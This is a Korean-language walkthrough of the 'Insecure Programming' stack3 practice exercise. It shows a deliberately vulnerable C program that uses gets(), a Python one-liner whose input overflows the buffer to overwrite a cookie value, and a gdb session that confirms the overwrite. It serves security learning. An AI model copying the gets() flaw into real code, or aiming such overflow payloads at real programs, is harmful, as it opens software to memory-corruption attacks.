Insecure-programming-stack3

Insecure Programming by example

Stack 3

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x01020005)
		printf("you win!\n");
}

stack2와 거의 동일하다 변경된 것은 cookie 값에 0x03 대신 0x00이 포함되어 있다는 것이다. 이는 stack2에서와 같이 python 코드를 작성하여 해결이 가능하다.

$ python -c "print ('\x05'+'\x00'+'\x02'+'\x01')*21" | ./stack3.exe
buf: 0028fe6c cookie: 0028febc
you win!

gdb 디버깅을 위해서 입력 값 파일을 생성하자.

$ python -c "print ('\x05'+'\x00'+'\x02'+'\x01')*21" > stack3_input

다른 특이사항이 없으므로 코드만 눈으로 읽고 지나가자.

(gdb) set disassembly-flavor intel
(gdb) b main
Breakpoint 1 at 0x401603
(gdb) r
Starting program: D:\011. ETC\deadbits\stack3.exe
[New Thread 11276.0x1d1c]

Breakpoint 1, 0x00401603 in main ()
(gdb) disas
Dump of assembler code for function main:
   0x00401600 <+0>:     push   ebp
   0x00401601 <+1>:     mov    ebp,esp
=> 0x00401603 <+3>:     and    esp,0xfffffff0
   0x00401606 <+6>:     sub    esp,0x70
   0x00401609 <+9>:     call   0x4017d0 <__main>
   0x0040160e <+14>:    lea    eax,[esp+0x6c]
   0x00401612 <+18>:    mov    DWORD PTR [esp+0x8],eax
   0x00401616 <+22>:    lea    eax,[esp+0x1c]
   0x0040161a <+26>:    mov    DWORD PTR [esp+0x4],eax
   0x0040161e <+30>:    mov    DWORD PTR [esp],0x404044
   0x00401625 <+37>:    call   0x4026d4 <printf>
   0x0040162a <+42>:    lea    eax,[esp+0x1c]
   0x0040162e <+46>:    mov    DWORD PTR [esp],eax
   0x00401631 <+49>:    call   0x4026ec <gets>
   0x00401636 <+54>:    mov    eax,DWORD PTR [esp+0x6c]
   0x0040163a <+58>:    cmp    eax,0x1020005
   0x0040163f <+63>:    jne    0x40164d <main+77>
   0x00401641 <+65>:    mov    DWORD PTR [esp],0x40405c
   0x00401648 <+72>:    call   0x4026cc <puts>
   0x0040164d <+77>:    mov    eax,0x0
   0x00401652 <+82>:    leave
   0x00401653 <+83>:    ret
   0x00401654 <+84>:    xchg   ax,ax
   0x00401656 <+86>:    xchg   ax,ax
   0x00401658 <+88>:    xchg   ax,ax
   0x0040165a <+90>:    xchg   ax,ax
   0x0040165c <+92>:    xchg   ax,ax
   0x0040165e <+94>:    xchg   ax,ax
End of assembler dump.
(gdb) b *main+58
Breakpoint 2 at 0x40163a
(gdb) delete 1
(gdb) r < stack3_input
The program being debugged has been started already.
Start it from the beginning? (y or n) [answered Y; input not from terminal]
Starting program: D:\011. ETC\deadbits\stack3.exe < stack3_input
[New Thread 5032.0x275c]

Breakpoint 2, 0x0040163a in main ()
(gdb) x/32x $esp
0x28fe50:       0x0028fe6c      0x0028fe6c      0x0028febc      0x00401687
0x28fe60:       0x00401740      0x75883021      0x0028fe70      0x01020005
0x28fe70:       0x01020005      0x01020005      0x01020005      0x01020005
0x28fe80:       0x01020005      0x01020005      0x01020005      0x01020005
0x28fe90:       0x01020005      0x01020005      0x01020005      0x01020005
0x28fea0:       0x01020005      0x01020005      0x01020005      0x01020005
0x28feb0:       0x01020005      0x01020005      0x01020005      0x01020005
0x28fec0:       0x00000000      0x005c178c      0x0028ff88      0x004013eb
(gdb) c
Continuing.
buf: 0028fe6c cookie: 0028febc
you win!
[Inferior 1 (process 5032) exited normally]

전체 목록 보기 : Insecure programming
진행 환경 : Windows7 MSYS32